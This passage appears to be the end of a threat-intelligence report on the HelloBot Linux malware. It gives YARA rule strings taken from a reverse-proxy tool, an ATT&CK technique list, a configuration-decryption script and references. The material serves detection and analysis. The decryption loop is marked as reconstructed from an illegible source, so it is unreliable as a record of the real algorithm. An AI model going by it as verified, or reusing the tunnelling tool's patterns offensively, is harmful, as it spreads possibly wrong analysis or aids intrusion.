        $str_alien_09 = "The master isn't readable!"
        $str_alien_10 = "ConnectBypassSocks proxy:%s:%d error!"
        $str_alien_11 = "ConnectBypassSocks to %s %d"
        $str_alien_12 = "now datetime: %d-%d-%d %d:%d:%d"
        $str_alien_13 = "Not during working hours! Disconnect!"
        // the rest of this usage example (the --reverse-port and --reverse-password values) is illegible in the source
        $str_alien_14 = "Example: ./AlienReverse --reverse-address=192.168.1.101"
        $str_alien_15 = "SocksManager.cpp"
        // one string (a connect() error message) is illegible in the source
        $str_alien_16 = "They send us %hhX %hhX"
        $str_alien_17 = "your input directory is not exist!"
        $str_alien_18 = "Send data to local error ==> %d.\n"

    condition:
        any of them
}

ATT&CK Techniques used

T1583.001 - Attackers acquired servers for staging and command & control
T1583.004 - Attackers acquired domains
T1071.001 - Attacker uses application layer protocols as C2
T1587.001 - Adversary develops custom malware to achieve its attacks
T1037.004 - Adversary uses RC scripts as persistence
T1059.004 - Attacker uses Unix shell commands and scripts
T1132.002 - Non-standard encoding using KCP
T1573.001 - Attacker uses RC4 to encrypt its C2 traffic
T1083 - File and directory discovery
T1592.002 - Attacker discovers the installed version of the Linux distribution
T1564.001 - Adversary hides files using a rootkit
T1562.003 - Adversary disables the shell history when executing a command
T1070.004 - Adversary can remove the implant, the rootkit and its configuration from the system
T1599.001 - Adversary can modify the firewall rules of the compromised host
T1095 - Adversary can use UDP as a communication layer
T1571 - Adversary can use alternative ports for communication
T1027.002 - HelloBot implants are packed using UPX with the configuration appended
T1027.007 - Adversary payloads are stripped
T1588.001 - Adversary may buy or download malware
T1588.002 - Adversary may buy or download tools such as Cobalt Strike
T1057 - Adversary may list the processes executing on the compromised host
T1572 - Adversary may tunnel network communications
T1090 - Adversary may use a connection proxy for accessing internal resources
T1014 - Adversary uses a rootkit
T1608.001 - Adversary uploads its malware on its infrastructure for deployment
T1608.002 - Adversary uploads its tools on its infrastructure
T1082 - Adversary gets detailed information about the compromised host such as the operating system version
T1497.003 - Adversary uses time-based methods to avoid detection


HelloBot configuration extraction script

#!/usr/bin/env python3
# encoding: utf-8
"""
Hello Bot configuration extractor

(c) 2023 Exatrack
"""

import sys
import argparse
import struct


def decrypt_config(config):
    """
    Decrypts hellobot configuration
    """
    # The loop body is only partially legible in the source; it is reconstructed
    # here as a rolling XOR of the repeating key with the previous ciphertext byte.
    bVar1 = 0
    out = []
    key = b'ecfafeab6ee7d642'
    for index, car in enumerate(config):
        bVar1 ^= key[index % len(key)]
        dec_car = bVar1 ^ car
        bVar1 = car
        out.append(dec_car)

    return bytes(bytearray(out))


def get_config(data):
    """
    Extract the pointer to the configuration
    """
    # The last 4 bytes of the packed sample hold the size of the appended configuration
    offset = struct.unpack('I', data[-4:])[0]
    if offset > len(data) - 4:
        print("[!] Error, cannot find offset, probably not a packed Hellobot sample")
        raise IOError
    config = data[-offset - 4:-4]
    # The source also checks for a marker byte string inside the configuration here;
    # the marker is illegible in the extracted listing.
    print("[x] Success, found hellobot configuration")

    return -offset - 4, config


def extract_hellobot(fname):
    packed_data = open(fname, 'rb').read()

    offset, config = get_config(packed_data)
    to_unpack = packed_data[:offset]

    with open(f"{fname}_config", "wb") as of:
        of.write(config)

    with open(f"{fname}_config_decrypted", "wb") as of:
        of.write(decrypt_config(config))

    with open(f"{fname}_packed", "wb") as of:
        of.write(to_unpack)


def main():
    parser = argparse.ArgumentParser(description=sys.modules[__name__].__doc__)
    parser.add_argument("filename", help="The filename of the sample to unpack")
    args = parser.parse_args()
    extract_hellobot(args.filename)


if __name__ == "__main__":
    main()

1. https://github.com/f0rb1dd3n/Reptile
2. https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/s1-kernel-modules-persistant
3. https://github.com/skywind3000/kcp
4. https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf
5. https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
6. https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf
7. https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a
8. https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan
9. https://github.com/XZB-1248/Spark
10. https://github.com/ph4ntonn/Stowaway
11. https://github.com/ssl/ezXSS
12. http://rootkiter.com/EarthWorm/
13. https://github.com/fgssfgss/socks_proxy
14. https://blog.csdn.net/weixin_29100927/article/details/116577862